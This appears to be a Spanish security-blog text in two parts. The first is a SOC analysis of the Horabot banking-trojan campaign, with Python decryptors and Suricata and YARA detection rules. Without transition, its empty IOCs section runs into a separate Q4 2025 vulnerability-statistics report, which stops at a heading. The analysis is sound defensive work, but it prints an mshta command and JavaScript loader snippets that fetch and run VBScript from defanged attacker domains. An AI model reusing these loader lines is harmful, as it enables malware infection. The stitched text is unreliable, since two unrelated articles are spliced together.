Introducción

En el episodio de hoy de nuestra serie Archivos del SOC, analizaremos paso a paso una campaña selectiva que nuestro equipo de MDR identificó y neutralizó hace unos meses. Esta campaña involucra una amenaza conocida como Horabot, un kit malicioso que combina un troyano bancario con un módulo de propagación por correo electrónico, y se distingue por su cadena de ataque de gran complejidad.

Si bien investigaciones previas ya han documentado campañas de Horabot (aquí y aquí), nuestro objetivo actual es resaltar lo activa que sigue esta amenaza y compartir algunos aspectos que no se abordaron en esos análisis.

El punto de partida

Como es habitual, nuestra historia comienza con una alerta que se disparó en el entorno de uno de nuestros clientes. La regla que la activó es genérica, pero efectiva para detectar actividad sospechosa de mshta. El caso avanzó a partir de esa alerta inicial, pero por suerte tuvo un desenlace positivo. Kaspersky Endpoint Security intervino, terminó el proceso malicioso (a través del PDM, el módulo de defensa proactiva) y eliminó los archivos relacionados antes de que la amenaza pudiera avanzar.

Más adelante, el incidente se presentó para discusión en una de nuestras reuniones semanales. Eso fue suficiente para despertar la curiosidad de uno de nuestros analistas y llevarlo a profundizar un poco más en las técnicas utilizadas en esta campaña.

La cadena de ataque

Después de investigar y de indagar a fondo en la infraestructura del adversario, nuestro equipo logró trazar la cadena de ataque completa. En esta sección, desglosaremos cada etapa y explicaremos cómo se desarrolla la operación.

Etapa 1: El señuelo inicial

Siguiendo las pistas observadas en el incidente reportado, la actividad parece comenzar con una página de CAPTCHA falsa, un señuelo común y corriente. En el incidente que mencionamos, la página se alojaba en la URL https://evs.grupotuis[.]buzz/0capcha17/ (los detalles sobre su contenido se pueden encontrar aquí).

Página falsa de CAPTCHA en la URL https://evs.grupotuis[.]buzz/0capcha17/

mshta https://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta

Es, en esencia, un pequeño loader. Al ejecutarse, abre una ventana en blanco y acto seguido descarga y ejecuta un payload JavaScript externa alojada en el dominio del atacante. El cuerpo contiene un gran bloque de palabras aleatorias sin sentido que sirven como relleno.

Etapa 2: Un toque de polimorfismo del lado del servidor

El payload por el archivo HTA crea dinámicamente un nuevo elemento <script>, establece que su origen es un VBScript externo alojado en otro dominio controlado por el atacante y lo inyecta en la sección <head> de una página definida estáticamente en el HTA. El contenido completo de la página se puede ver en el recuadro a continuación. Tras agregarse, el script VBS externo se descarga y ejecuta al instante, llevando el ataque a su etapa siguiente.

var scriptEle = document.createElement("script");
scriptEle.setAttribute("src", "https://pdj.gruposhac[.]lat/g1/ld1/"); 
scriptEle.setAttribute("type", "text/vbscript"); 
document.getElementsByTagName('head')[0].appendChild(scriptEle);

El contenido VBS de la siguiente etapa es similar al ejemplo que se muestra a continuación. Durante nuestro análisis, observamos el uso de polimorfismo de servidor, ya que cada acceso al mismo recurso devolvía una versión ligeramente diferente del código, pero que conservaba la misma funcionalidad.

El script está ofuscado y emplea una rutina de codificación de cadenas personalizada. A continuación, se muestra una versión más legible, con sus cadenas decodificadas y reemplazadas mediante un pequeño script en Python que replica la rutina decode_str().

El script cumple casi la misma función que el archivo HTA inicial. Accede a un cargador de JavaScript, que luego inyecta y ejecuta otro script VBS polimórfico.

var scriptEle = document.createElement("script");
scriptEle.setAttribute("src", "https://pdj.gruposhac[.]lat/g1/"); 
scriptEle.setAttribute("type", "text/vbscript"); 
document.getElementsByTagName('head')[0].appendChild(scriptEle);

A diferencia del primer script, este es mucho más complejo, con más de 400 líneas de código. Actúa como el “brazo fuerte” de la operación. A continuación, un breve resumen de sus principales características:

• Ofuscación avanzada: el script utiliza múltiples capas de ofuscación para ocultar su comportamiento.
• Decodificador de cadenas personalizado: emplea la misma rutina de decodificación presente en el primer script VBS para reconstruir cadenas en tiempo de ejecución.
• Anti-VM y “anti-Avast”: realiza comprobaciones básicas del entorno y finaliza si detecta una carpeta específica de Avast o artefactos de máquina virtual.
• Recopilación y exfiltración de información: recopila la IP del host, el nombre del host, el nombre de usuario y la versión del sistema operativo, y luego envía estos datos a un servidor C2.
• Descarga de componentes adicionales: obtiene un ejecutable de AutoIt, su compilador (Aut2Exe), un script (au3) y un archivo blob, y los coloca en la ruta predefinida “C:\Users\Public\LAPTOP-0QF0NEUP4″.
• Ejecución de comandos de PowerShell: ejecuta comandos de PowerShell que se conectan a dos URL diferentes (una no disponible y la otra que lleva al primer stage del propagador, que describiremos más adelante).
• Configuración de persistencia: crea un archivo LNK y lo coloca en la carpeta Inicio para mantener la persistencia.
• Rutinas de limpieza: elimina archivos temporales y finaliza determinados procesos.

Durante el análisis del “heavy lifter”, específicamente dentro de la rutina de exfiltración, identificamos el destino al que se enviaban los datos recopilados. Tras explorar la URL asociada y eliminar la parte “salvar.php”, descubrimos una página web accesible públicamente que el atacante usaba para enumerar a todas sus víctimas.

Como habrán notado, la tabla está en portugués de Brasil y enumera víctimas desde mayo de 2025 (esta captura de pantalla se tomó en septiembre). En la columna “Localização”, el adversario hasta incluyó las coordenadas geográficas de las víctimas, que están tachadas en la captura de pantalla. Un desglose rápido muestra que de 5384 víctimas, 5030 se encontraban en México, lo que representa cerca el 93 % del total.

Etapa 3: La combinación maléfica de AutoIT y el troyano bancario.

Ahora es momento de centrarnos en los archivos descargados por el “heavy lifter”. Como se mencionó antes, en el disco se colocaron tres componentes de AutoIT: el ejecutable (AutoIT3), el compilador (Aut2Exe) y el script (au3), junto con un archivo blob cifrado. Como tenemos acceso al código del script de AutoIt, podemos analizar sus rutinas. El problema es que contiene más de 750 líneas de código muy ofuscado, así que, de nuevo, nos centraremos solo en lo realmente importante.

La rutina más importante se encarga de descifrar el archivo blob (utiliza AES-192 con una clave derivada del valor semilla 99521487), cargarlo directamente en memoria y luego invocar la función exportada B080723_N. El blob descifrado es una DLL.

Aquí también logramos replicar la lógica de descifrado con un script de Python y extraer la DLL (0x6272EF6AC1DE8FB4BDD4A760BE7BA5ED) manualmente. Después de un análisis inicial y una ejecución básica en un entorno controlado (sandbox), observamos lo siguiente:

• La muestra es un conocido troyano bancario escrito en Delphi, detectado por varios motores con diferentes nombres, como Casbaneiro, Ponteiro, Metamorfo y Zusy.
• Incluye dos bibliotecas antiguas de OpenSSL (libeay32.dll y ssleay32.dll) del Proyecto Indy, una biblioteca de comunicaciones cliente/servidor de código abierto que se utiliza para establecer la comunicación con el C2 por HTTPS.
• Incluye comandos SQL utilizados para extraer credenciales de los navegadores.

Una vez cargado en memoria, el troyano envía varias solicitudes HTTP a algunas URLs diferentes:

Dado que esta familia de malware ha sido ampliamente documentada en investigaciones previas, no repetiremos su funcionalidad ya conocida. En su lugar, nos centraremos en las características menos documentadas y observadas recientemente, incluyendo la lógica de cifrado y manejo de protocolo del malware.

La muestra implementa un cifrado por XOR-sustracción con estado en la subrutina sub_00A86B64, que se utiliza para proteger cadenas y descifrar los datos HTTP recibidos del C2. A diferencia de un XOR simple, cada byte de salida aquí depende tanto de la clave como del byte anterior. En nuestra muestra, la clave es la cadena "0xFF0wx8066h".

Construcción de la clave (izquierda) y lógica de descifrado (derecha)

Podemos reimplementar fácilmente la lógica de esta rutina en Python; para ello, podemos usar el siguiente fragmento e integrarlo en nuestro flujo de trabajo y automatizar así el descifrado de cadenas:

def decrypt_string(encrypted_hex):
    key_string = "0xFF0wx8066h"
    key_index = 0
    result = ""
    
    current_key = int(encrypted_hex[0:2], 16)
    
    i = 2
    while i < len(encrypted_hex):
        next_key = int(encrypted_hex[i:i+2], 16)
        if key_index >= len(key_string):
            key_index = 0
        key_char = ord(key_string[key_index])
        xored_value = next_key ^ key_char
        
        if xored_value > current_key:
            decrypted_char = xored_value - current_key
        else:
            decrypted_char = (xored_value + 0xFF) - current_key
        
        result += chr(decrypted_char)
        current_key = next_key
        key_index += 1
        i += 2
    
    return result

Python implementation of the decryption routine

Las cadenas cifradas se recuperan mediante tres métodos distintos: a través de búsquedas indexadas en una lista global cifrada de cadenas en Delphi (también observada por nuestros colegas de ESET), mediante referencias directas a cadenas cifradas en formato hexadecimal en la sección de datos, y por medio de referencias indirectas usando variables puntero, lo que añade cierta complejidad al automatizar el descifrado con scripts.

Puntero directo (izquierda), puntero indirecto (derecha)

Cadenas indexadas mediante búsquedas en TStringList

El malware obtiene su configuración realizando una solicitud HTTPS GET a su servidor C2, que está codificado y cifrado. El servidor responde con una configuración en forma de respuesta HTTP en bruto, que consta de varios valores, cada uno cifrado con el mismo algoritmo ya mencionado. La muestra extrae parámetros específicos según su posición en la lista.

Valores de configuración descifrados (contraseña de root oculta)

Para mejorar la legibilidad, la captura de pantalla anterior se ha editado añadiendo los parámetros descifrados y separándolos con dobles saltos de línea.

La obtención y el análisis de la configuración se inician en la subrutina sub_00AD2C70, donde se extrae el primer valor de configuración: el ajuste de conexión del socket C2 (host;puerto).

Extracción de la dirección del socket C2

Si el análisis falla, el malware recurre a una dirección de socket C2 secundaria predefinida, tras lo cual se establece la conexión por socket.

Repliegue a la dirección de socket predefinida (lifenews[.]pro:49569)

Extracción de los valores 5 y 6 de la configuración

Además de la comunicación HTTP, el malware también admite comunicación por socket sin formato mediante un protocolo personalizado que encapsula comandos en etiquetas como <|SIMPLE_TAG|> o <|TAG|>Arg1<|>Arg2<<|>.

El cliente inicia la conexión C2 en sub_00AD331C, donde establece un socket TCP con el servidor del operador y envía el comando “PRINCIPAL” para solicitar un canal de control. Al recibir una respuesta OK, continúa con un mensaje “Info” que contiene detalles del sistema. Una vez validado, el servidor responde con un mensaje “SocketMain” que incluye un ID de sesión, completando el handshake. Todo el manejo posterior de comandos ocurre en sub_00AD373C, una rutina orquestadora central que analiza los mensajes entrantes y ejecuta las acciones maliciosas.

La muestra, y por tanto el protocolo mismo, se hereda (como ya lo señalaron nuestros colegas de ESET) del proyecto de código abierto Delphi Remote Access PC. A continuación, se muestra una comparación visual:

Comparación de los comandos “PING” y “Close” (desensamblado de la muestra a la izquierda, código fuente de Delphi Remote Access a la derecha)

Algunas funciones del proyecto de código abierto, como los comandos de chat y manipulación de archivos, se han eliminado, mientras que algunos comandos relacionados con el mouse se han renombrado de forma extraña con prefijos lúdicos como “LULUZ” (por ejemplo, LULUZLD, LULUZPos), posiblemente como una broma interna, ofuscación contra análisis, o simplemente para marcar variantes personalizadas. Más allá de la funcionalidad estándar, el protocolo ahora incluye una serie de comandos personalizados adicionales como LULUZSD para desplazar la rueda del ratón hacia abajo, ENTERMANDA (para simular la tecla Enter) y COLADIFKEYBOARD (para inyectar texto arbitrario como pulsaciones de teclas).

El conjunto completo de comandos es mucho mayor, y aunque no todos los comandos están implementados en la muestra analizada, la evidencia de su presencia (por ejemplo, en forma de cadenas) sugiere un desarrollo continuo.

Después de comprender el protocolo, centrémonos en el cifrado utilizado. En esta muestra, el tráfico intercambiado a través del canal de socket C2 se cifra mediante otro algoritmo XOR con estado que incluye claves de descifrado embebidas. Su lógica se implementa en las rutinas sub_00A9F2D0 (cifrado) y sub_00A9F5C0 (descifrado):

Rutina de cifrado sub_00A9F2D0

La rutina de cifrado genera tres claves enteras aleatorias de cuatro dígitos. La primera clave actúa como el estado inicial del cifrado, mientras que las otras dos sirven como multiplicador e incremento, que se aplican en cada etapa de cifrado tanto al estado como a los datos. Para cada carácter de la cadena de entrada, toma el byte más alto del estado actual, le aplica XOR con el carácter a cifrar y luego actualiza el estado del cifrado para el siguiente carácter. La salida se crea agregando las tres claves al texto cifrado y encapsulando todo dentro de los marcadores “##”. La salida final tendrá el siguiente aspecto:

##[clave1][clave2][clave3][datos_hex_cifrados]##

Aquí hay un fragmento de código Python para decodificar dicho tráfico:

def deobfuscate_traffic(obfuscated):
    if not (obfuscated.startswith("##") and obfuscated.endswith("##")):
        raise ValueError("Invalid format")
    core = obfuscated[2:-2]
    
    key1 = int(core[0:4])
    key2 = int(core[4:8])
    key3 = int(core[8:12])
    
    hex_data = core[12:]
    
    current_key = key1
    output_chars = []
    
    for i in range(0, len(hex_data), 2):
        xored = int(hex_data[i:i+2], 16)
        
        high_byte = (current_key >> 8) & 0xFF
        original_char = chr(xored ^ high_byte)
        output_chars.append(original_char)
        
        current_key = ((current_key + xored) * key2 + key3) & 0xFFFF
    
    return "".join(output_chars)

Esta capa de cifrado, que quizá pretendía evadir la inspección de red, irónicamente facilita la detección debido a su estructura altamente regular y repetitiva. Este patrón, que incluye los marcadores externos “##”, es poco común en el tráfico legítimo y puede utilizarse como una firma de red confiable para sistemas IDS/IPS. A continuación se muestra una regla de Suricata que coincide con la estructura descrita:

alert tcp any any -> any any ( \
    msg:"Horabot C2 socket communication (##hex##)"; \
    flow:established; \
    content:"##"; depth:2; fast_pattern; \
    content:"##"; endswith; \
    pcre:"/^##[1-9][0-9]{3}[1-9][0-9]{3}[1-9][0-9]{3}[0-9A-F]+##$/"; \
    classtype:trojan-activity; \
    sid:1900000; \
    rev:1; \
    metadata:author Domenico; \

El malware contiene funcionalidad para mostrar ventanas emergentes falsas a las víctimas y solicitarles que ingresen credenciales bancarias, como también lo documentaron nuestros colegas de Fortinet. Las imágenes para estas ventanas emergentes se almacenan como recursos cifrados. A diferencia de las cadenas, los recursos se descifran utilizando el cifrado RC4 estándar y la clave, pega-avisao3234029284, se obtiene de la estructura TStringList anterior en el offset 3FEh.

Superposición de token falso utilizada para el robo de credenciales (derecha), con desensamblado (izquierda)

El juego de palabras con “pega a visão”, una jerga brasileña que significa “capta la idea” en sentido figurado, revela una referencia cultural intencionada, lo que respalda los ya conocidos vínculos brasileños de los operadores, quienes poseen un conocimiento nativo del idioma.

A continuación se muestra un collage de imágenes donde se ven las superposiciones de los bancos objetivo.

Fragmento de superposiciones falsas descifradas

Etapa 4: El propagador

En nuestras pruebas, notamos que tanto el script VBS (el “heavy lifter”) como la DLL de Delphi tienen funcionalidades superpuestas para descargar la siguiente etapa mediante PowerShell. Utilizan diferentes dominios, pero siguen el mismo patrón de URL.

Intentamos acceder a las URL destinadas a descargar el propagador. Una de las URL no devolvió nada, y en la otra observamos una secuencia de dos etapas  de PowerShell antes de llegar al propagador real.

En la segunda, encontramos varias URLs codificadas en base64, pero solo una de ellas estaba activa durante nuestro análisis. Basándonos en los comentarios encontrados en el código del propagador, sospechamos que, en versiones o campañas anteriores, el propagador se ensamblaba pieza por pieza a partir de estas otras URL. En nuestro caso, sin embargo, una sola URL contenía todo el código necesario.

Fragmento de superposiciones falsas descifradas

Sí, también nos preguntábamos si PowerShell podía aceptar caracteres ASCII extraños como nombres de variables/funciones, y sí, lo hace. Tras limpiar esta caótica convención de nombres y revisar las rutinas bien comentadas (gracias, actor de amenaza), logramos identificar sus funciones principales:

• Recolectar correos electrónicos a través del espacio de nombres MAPI
• Exfiltrar direcciones de correo electrónico únicas al C2
• Limpiar la Bandeja de salida
• Usar una lista de palabras clave de bloqueo para filtrar las direcciones de correo electrónico exfiltradas.
• Preparar un correo de phishing que contenga un PDF malicioso
• Distribuirlo en masa a las direcciones filtradas

Un punto interesante es que el código y los comentarios del propagador nos permiten extraer información útil:

• Todos los comentarios están redactados en portugués brasileño, lo que sugiere con claridad el origen del actor de amenaza.
• Es bastante fácil distinguir los comentarios escritos por un humano de los que probablemente fueron generados por una IA/LLM: estos últimos son demasiado formales y están muy bien estructurados. Uno de los comentarios humanos fue, de hecho, la inspiración principal para el título de este artículo.
• Uno de los comentarios en el código es “limpa a caixa de saida antes de sapecar”. Sapecar tiene un significado muy específico que solo los hablantes de portugués de Brasil comprenden sin explicación. El equivalente más cercano a este comentario en español sería algo como: Limpia la bandeja de salida antes de “darle con todo” o “darle duro”.

Dado que hemos estado rastreando la actividad de Horabot durante varios meses, nuestro equipo pudo recopilar una colección de ejemplos de archivos adjuntos maliciosos utilizados en esta campaña. Todos están escritos en español e instan al usuario a hacer clic en un gran botón dentro del documento para acceder a un “archivo confidencial” o una “factura”. Una vez que se hace clic, se activa la misma cadena de infección descrita en este artículo.

Detección de ingeniería y oportunidades de búsqueda de amenazas

Después de recorrer esta larga y compleja cadena de ataque, apostamos a que algunos de los más técnicos que lean esto, ya han comenzado a imaginar posibles oportunidades de detección.

Con eso en mente, esta sección reúne algunas reglas y consultas que pueden servir para detectar y buscar esta amenaza en su propio entorno.

Reglas Yara

Las reglas YARA se centran en dos componentes esenciales de la operación: el script de AutoIt que actúa como cargador y la DLL escrita en Delphi que funciona como troyano bancario.

import "pe"
rule Horabot_Delphi_Trojan
{
    meta:
        author = "maT"
        description = "Detects Horabot payload/trojan (Delphi DLL)"
        hash_01 = "6272ef6ac1de8fb4bdd4a760be7ba5ed"
        hash_02 = "4caa797130b5f7116f11c0b48013e430"
        hash_03 = "c882d948d44a65019df54b0b2996677f"
    condition:
        uint32be(0) == 0x4d5a5000 and 
        filesize < 150MB and 
        pe.is_dll() and
        pe.number_of_exports == 4 and
        pe.exports("dbkFCallWrapperAddr") and
        pe.exports("__dbk_fcall_wrapper") and
        pe.exports("TMethodImplementationIntercept") and
        pe.exports(/^[A-Z][0-9]{6}_[A-Z0-9]$/)
}
rule Horabot_AutoIT_Loader
{
    meta:
        author = "maT"
        description = "Detects AutoIT script used as a loader by Horabot"
    
    strings:
        $winapi_01 = "Advapi32.dll"
        $winapi_02 = "CryptDeriveKey"
        $winapi_03 = "CryptDecrypt"
        $winapi_04 = "MemoryLoadLibrary"
        $winapi_05 = "VirtualAlloc"
        $winapi_06 = "DllCallAddress"
        $str_seed = "99521487"
        $str_func01 = "B080723_N"
        $str_func02 = "A040822_1"
        $opt_hexstr01 = { 20 3D 20 22 ?? ?? ?? ?? ?? ?? ?? 5F ?? 22 20 0D 0A 4C 6F 63 61 6C 20 24} // = "B080723_N" CRLF Local $
        $opt_aes192 = "0x0000660f" // CALG_AES_192
        $opt_md5 = "0x00008003" // CALG_MD5      
    condition:
        filesize < 100KB and
        all of ($winapi*) and
        (
            1 of ($str*) or
            all of ($opt*)
        )
}

Hunting queries

Se puede notar que algunos patrones en esta sección no aparecen en las URL descritas anteriormente en el artículo. Esto se debe a que los patrones adicionales se incluyeron porque hemos observado pequeñas variaciones introducidas por el actor de amenazas con el tiempo, como por ejemplo, el uso de códigos QR en las páginas señuelo.

IOCs

El cuarto trimestre de 2025 fue uno de los más saturados en cuanto a la cantidad de publicaciones de vulnerabilidades críticas de alto perfil que se encontraron en bibliotecas y aplicaciones. En este contexto, los delincuentes no tardaron en comenzar a explotar algunas de estas vulnerabilidades.

En este informe analizamos las estadísticas de vulnerabilidades y exploits publicados, así como las vulnerabilidades conocidas que se utilizaron con los frameworks C2 más populares durante el cuarto trimestre de 2025.

Estadísticas de vulnerabilidades registradas

Esta sección contiene estadísticas sobre las vulnerabilidades registradas. Los datos se obtuvieron del portal cve.org.

A continuación, se analiza la cantidad de CVE registrados por mes durante los últimos 5 años, hasta finales de 2025 inclusive. Tal como lo anticipamos en el informe anterior, en el cuarto trimestre se registraron más vulnerabilidades que en el mismo período de 2024, y los totales anuales también superaron los del año anterior.

Número total de vulnerabilidades publicadas cada mes, de 2021 a 2025 (descargar)

A continuación, se analiza la cantidad de nuevas vulnerabilidades críticas (CVSS > 8,9) durante el mismo período.

Número total de vulnerabilidades críticas publicadas cada mes, de 2021 a 2025 (descargar)

El gráfico muestra que la cantidad de vulnerabilidades críticas sigue siendo considerable; sin embargo, en la segunda mitad del año se registró una reducción hasta los niveles de 2023. Esto se debió a la rotación de vulnerabilidades: algunos problemas de seguridad publicados fueron retirados. Además, la adopción generalizada de prácticas de desarrollo seguro y el uso de lenguajes de programación más seguros influyeron en la cantidad de nuevas vulnerabilidades críticas, aunque esto no logró resolver el problema del volumen total de vulnerabilidades.

Estadísticas sobre la explotación de vulnerabilidades

La sección contiene estadísticas sobre el uso de exploits durante el cuarto trimestre de 2025. Los datos se obtuvieron de fuentes de acceso público y mediante nuestra telemetría.

Explotación de vulnerabilidades en Windows y Linux

En el cuarto trimestre de 2025, los exploits más frecuentes correspondieron a las mismas vulnerabilidades que se utilizaron con mayor frecuencia en ataques durante el resto del año. Se trata de exploits en productos de Microsoft Office con problemas de seguridad sin corregir.

Las soluciones de Kaspersky detectaron la mayor cantidad de exploits para las siguientes vulnerabilidades de la plataforma Windows:

• CVE-2018-0802: vulnerabilidad de ejecución remota de código en el componente Equation Editor.
• CVE-2017-11882: otra vulnerabilidad de ejecución remota de código que también afecta a Equation Editor;
• CVE-2017-0199: vulnerabilidad en Microsoft Office y WordPad que permite a un atacante tomar el control del sistema.

Esta lista se mantiene sin cambios desde hace varios años.

También observamos que los actores maliciosos continúan adaptando exploits para vulnerabilidades de path traversal (CWE-35) al descomprimir archivos en WinRAR. Se utilizan para obtener acceso inicial mediante archivos maliciosos en el sistema operativo Windows:

• CVE-2023-38831: vulnerabilidad que consiste en el procesamiento incorrecto de objetos que se encuentran dentro de un archivo comprimido;
• CVE-2025-6218 (anteriormente ZDI-CAN-27198): vulnerabilidad que permite especificar una ruta relativa y descomprimir archivos en un directorio arbitrario. Esto puede llevar a la ejecución de comandos maliciosos. Dimos más información sobre esta vulnerabilidad en el informe del segundo trimestre de 2025;
• CVE-2025-8088: vulnerabilidad analizada en el informe anterior, similar a CVE-2025-6218. Como mecanismo para eludir el control del directorio de descompresión, los actores maliciosos utilizaron NTFS Streams.

Al igual que en el trimestre anterior, observamos un aumento en el uso de exploits para archivadores, y los ataques aprovechan con mayor frecuencia vulnerabilidades recientes.

A continuación, se muestra la dinámica de detección de exploits en sistemas Windows durante los últimos dos años.

Evolución del número de usuarios de Windows que se enfrentaron a exploits, Q1 2024–Q4 2025. Se toma como 100% el número de usuarios que se enfrentaron a exploits en el primer trimestre de 2024 (descargar)

Las vulnerabilidades mencionadas pueden utilizarse para obtener acceso inicial a un sistema vulnerable. Esto subraya la importancia de aplicar actualizaciones de manera oportuna para el software correspondiente.

En dispositivos con Linux, los exploits detectados con mayor frecuencia correspondieron a las siguientes vulnerabilidades:

• CVE-2022-0847: vulnerabilidad conocida como Dirty Pipe, que permite elevar privilegios e interceptar el control de aplicaciones en ejecución;
• CVE-2019-13272: vulnerabilidad de manejo incorrecto de privilegios heredados, que puede utilizarse para elevar privilegios;
• CVE-2021-22555: vulnerabilidad de desbordamiento de montículo (heap overflow) en el subsistema del núcleo Netfilter.
• CVE-2023-32233: otra vulnerabilidad en el subsistema Netfilter que permite crear condiciones de Use-After-Free y elevar privilegios mediante el procesamiento incorrecto de solicitudes de red.

Evolución del número de usuarios de Linux que encontraron exploits, Q1 2024–Q4 2025. Se toma como 100% el número de usuarios que se enfrentaron a exploits en el primer trimestre de 2024 (descargar)

Observamos un crecimiento notable en la cantidad de ataques con exploits para Linux: en el cuarto trimestre, el doble de usuarios se vio afectado en comparación con el tercero. Nuestras estadísticas muestran que el último trimestre del año concentró más de la mitad de todos los ataques con exploits para Linux respecto al total anual. La principal causa de este aumento es el rápido crecimiento del número de dispositivos con Linux. Cabe señalar que esto atrae la atención de los actores maliciosos, por lo que la instalación de parches de seguridad es de importancia crítica.

Los exploits publicados más difundidos

La distribución de exploits publicados por tipo de software en el cuarto trimestre de 2025 es en gran medida similar a la del trimestre anterior. La mayor cantidad de exploits que analizamos en el marco del monitoreo de investigaciones públicas, noticias y PoC sigue correspondiendo a vulnerabilidades en sistemas operativos.

Distribución de exploits publicados por plataforma, Q1 2025 (descargar)

Distribución de exploits publicados por plataforma, Q2 2025 (descargar)

Distribución de exploits publicados por plataforma, Q3 2025 (descargar)

Distribución de exploits publicados por plataforma, Q4 2025 (descargar)

En el cuarto trimestre de 2025 no aparecieron exploits públicos para productos de Microsoft Office, pero se detectaron problemas en componentes del sistema que constituyen la mayor parte de las vulnerabilidades. Para el cálculo de estadísticas, los clasificamos en la categoría “SO”.

Uso de vulnerabilidades en ataques APT

Analizamos qué vulnerabilidades se utilizaron en ataques APT durante el cuarto trimestre de 2025. La clasificación presentada a continuación incluye datos obtenidos gracias a nuestra telemetría, investigaciones y fuentes abiertas.

TOP 10 de vulnerabilidades explotadas en ataques APT, Q4 2025 (descargar)

En el cuarto trimestre de 2025, los ataques APT explotaron con mayor frecuencia vulnerabilidades recientes publicadas en los últimos seis meses. Consideramos que estos CVE se convertirán en favoritos de los actores maliciosos por un tiempo prolongado, ya que su corrección puede requerir cambios estructurales significativos en las aplicaciones o sistemas afectados. Con frecuencia, la sustitución o actualización de los componentes afectados requiere una cantidad considerable de recursos; por lo tanto, la probabilidad de ataques a través de estas vulnerabilidades puede mantenerse durante un período prolongado. Es muy probable que algunas nuevas vulnerabilidades se conviertan en una herramienta frecuente para desarrollar ataques dentro de la infraestructura de los usuarios, ya que se han detectado problemas de seguridad en los servicios de red disponibles sin autenticación. Esta explotación activa de vulnerabilidades registradas hace muy poco tiempo evidencia que los actores maliciosos son capaces de aplicar nuevas técnicas con mucha rapidez, y adaptar las antiguas en sus ataques. Por ello, recomendamos encarecidamente aplicar los parches de seguridad proporcionados por los proveedores.

Frameworks C2

En esta sección analizaremos los frameworks C2 más populares utilizados por atacantes y las vulnerabilidades y exploits que interactuaron con agentes C2 en ataques APT.

El gráfico a continuación muestra la frecuencia de casos conocidos de uso de C2-frameworks en ataques a usuarios durante el cuarto trimestre de 2025, según fuentes abiertas.

TOP 10 de frameworks C2 utilizados por APT para comprometer sistemas de usuarios, Q4 2025 (descargar)

El primer lugar en la lista de C2-frameworks más utilizados sigue siendo Sliver, a pesar de la gran cantidad de rastros que puede dejar cuando se usa en su configuración estándar. En segundo y tercer lugar se encuentran Mythic y Havoc, respectivamente. Analizamos fuentes abiertas, examinamos muestras de agentes C2 maliciosos que contienen exploits y determinamos que en los ataques APT con los C2-frameworks mencionados se utilizaron las siguientes vulnerabilidades:

• CVE-2025-55182: vulnerabilidad React2Shell en React Server Components, que permite a un usuario no autorizado enviar comandos directamente al servidor y ejecutarlos desde la memoria;
• CVE-2023-36884: vulnerabilidad en el componente Búsqueda de Windows que permite ejecutar comandos en el sistema eludiendo los mecanismos de protección integrados en las aplicaciones de Microsoft Office;
• CVE-2025-53770: vulnerabilidad de deserialización insegura en Microsoft SharePoint que permite ejecutar comandos en el servidor sin autenticación;
• CVE-2020-1472: vulnerabilidad conocida como Zerologon, que permite comprometer un controlador de dominio vulnerable y ejecutar comandos con privilegios de usuario elevados;
• CVE-2021-34527: vulnerabilidad conocida como PrintNightmare, que aprovecha deficiencias en el subsistema de impresión de Windows y permite acceder de forma remota al sistema operativo vulnerable y ejecutar comandos con altos privilegios;
• CVE-2025-8088 y CVE-2025-6218: vulnerabilidades similares de path traversal que permiten descomprimir archivos de un archivo comprimido en una ruta predefinida, sin que el archivador muestre ningún mensaje al usuario.

El conjunto de vulnerabilidades descrito permite determinar que los actores maliciosos las utilizaron para iniciar el ataque y realizar acciones iniciales en los sistemas vulnerables, creando las condiciones para el lanzamiento del agente C2. Entre las vulnerabilidades hay tanto zero-days como problemas de seguridad bastante conocidos.

Vulnerabilidades interesantes

Esta sección contiene las vulnerabilidades más relevantes publicadas en el cuarto trimestre de 2025 que cuentan con una descripción disponible al público.

React2Shell (CVE-2025-55182): vulnerabilidad en React Server Components

Por lo general, describimos vulnerabilidades que afectan a una aplicación específica. La vulnerabilidad CVE-2025-55182 fue una excepción, ya que fue descubierta en la biblioteca React para el desarrollo de aplicaciones web. Esto significa que la explotación de la vulnerabilidad podría afectar potencialmente a una gran cantidad de aplicaciones que utilizan la biblioteca. La vulnerabilidad en sí se encuentra en el mecanismo de interacción entre el cliente y el servidor, que se basa en el envío de objetos serializados. Si un actor malicioso envía datos serializados con funcionalidad maliciosa, puede ejecutar comandos en JavaScript directo en el servidor, sin validación de la solicitud por parte del cliente. Los detalles técnicos sobre esta vulnerabilidad y un ejemplo de detección por parte de las soluciones de Kaspersky se pueden encontrar en nuestro artículo.

CVE-2025-54100: inyección de comandos al ejecutar el comando curl (Invoke-WebRequest)

Vulnerabilidad que consiste en el procesamiento incorrecto de datos al recibirlos desde un servidor remoto: al ejecutar el comando curl o Invoke-WebRequest, Windows inicia Internet Explorer en segundo plano. Esto puede derivar en un ataque de tipo cross-site scripting (XSS).

CVE-2025-11001: vulnerabilidad en 7-Zip

Esta vulnerabilidad refuerza la tendencia de explotación de problemas de seguridad encontrados en archivadores. La esencia de CVE-2025-11001 radica en el procesamiento incorrecto de enlaces simbólicos. Un actor malicioso puede crear un archivo comprimido de tal manera que, al descomprimirlo en un directorio arbitrario, el contenido del archivo quede donde apunta el enlace simbólico. La probabilidad de explotación de esta vulnerabilidad se reduce considerablemente, ya que para utilizar dicha funcionalidad es necesario que el usuario que abre el archivo comprimido tenga derechos de administrador del sistema.

Con esta vulnerabilidad se asocia una ola de noticias erróneas sobre su uso en ataques reales contra sistemas de usuarios: el malentendido surgió por un error en el boletín de seguridad.

RediShell (CVE-2025-49844): vulnerabilidad en Redis

El año 2025 fue prolífico en vulnerabilidades de alto perfil con nombre propio. Una de ellas fue CVE-2025-49844, también conocida como RediShell, que fue descubierta durante una competencia. Esta vulnerabilidad es un problema de Use-After-Free relacionado con el funcionamiento del comando load en scripts del intérprete Lua. Para llevar a cabo el ataque, al actor malicioso le basta con preparar un script malicioso y cargarlo en el intérprete.

Como cualquier vulnerabilidad con nombre propio, RediShell fue adoptada de inmediato por actores maliciosos y spammers, aunque de una manera algo inusual. Dado que inicialmente se publicaron en la red datos incompletos sobre la naturaleza de la vulnerabilidad, Internet se inundó de PoC y escáneres falsos que ofrecían verificar la posibilidad de explotación. Sin embargo, en el mejor de los casos estos “escáneres” no hacían nada, y en el peor infectaban el sistema. Cabe destacar que estos proyectos fueron generados y presentados con mayor frecuencia mediante LLM. Utilizaban una plantilla uniforme y citaban como código fuente otras fuentes falsas similares.

CVE-2025-24990: vulnerabilidad en el controlador ltmdm64.sys

